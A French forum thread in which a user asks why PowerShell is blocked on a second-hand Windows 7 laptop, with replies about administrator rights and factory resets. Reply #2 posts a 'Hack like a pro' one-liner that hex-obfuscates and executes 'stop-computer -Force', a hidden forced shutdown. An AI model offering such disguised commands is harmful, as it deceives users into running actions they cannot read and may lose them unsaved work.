Annonce

Réduire
Aucune annonce.

Message d'erreur Windows 7 (titre modifié par fred)

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Message d'erreur Windows 7 (titre modifié par fred)

    Lorsque j'essaye de lancer POWERSHELL dans mon PC DELL LATITUDE E6510 COREI7 où j'ai installé Windows 7 32bits, voici le message qui s'affiche:Cette opération a été annulée en raison de restrictions sur cet ordinateur. Contactez votre administrateur système.
    Que faire pour remédier à ce problème svp.
    Dernière modification par fred, 19 septembre 2018, 17h11.

  • #2
    Il faut contacter ton administrateur système.
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Bonjour, en fait je ne comprends pas bien ton message stp éclairci moi un peu plus

      Commentaire


      • #4
        Bonjour,

        est ce un pc d'entreprise ou ton pc perso?
        Il semblerait que tu ne sois pas admin sur ta machine.

        Cordialement

        Commentaire


        • #5
          Bjr c'est ma propre machine seulement comme je l'avais acheté seconde main elle est venue avec une bande où il est inscrit : USER NAME:cechd-2436\cchd.
          Je ne sais si jamais elle a dabord été machine d'entreprise.

          Commentaire


          • #6
            Bonjour,

            Quand tu achetes un machine, je pense que la première chose a faire est de la restaurer avec les paramètres d'usines, étant donné que tu ne sais pas ce qui a été installé dessus avant.

            As tu essayé de lancer powershell en tant qu'administrateur (clic droit)?

            Cordialement

            Commentaire


            • #7
              Ecoute il faut que tu ailles dans les paramètres à "comptes". Tu configure ton nom, tes mots de passe et plus. Si tu veux être vraiment réglo on te proposera même un compte Microsoft gratuit. Ce sont des procédures qui t'identifient en tant que propriétaire de l'ordinateur, et qui font de toi l'administrateur, avec ses mots de passe personnels. Windows en compte au moins quatre pour l'administrateur. Va dans "confidentialité" ou " comptes" dans les paramètres et remet tout à ton nom.

              Commentaire


              • #8
                Merci beaucoup pour votre aide

                Commentaire

                Chargement...
                X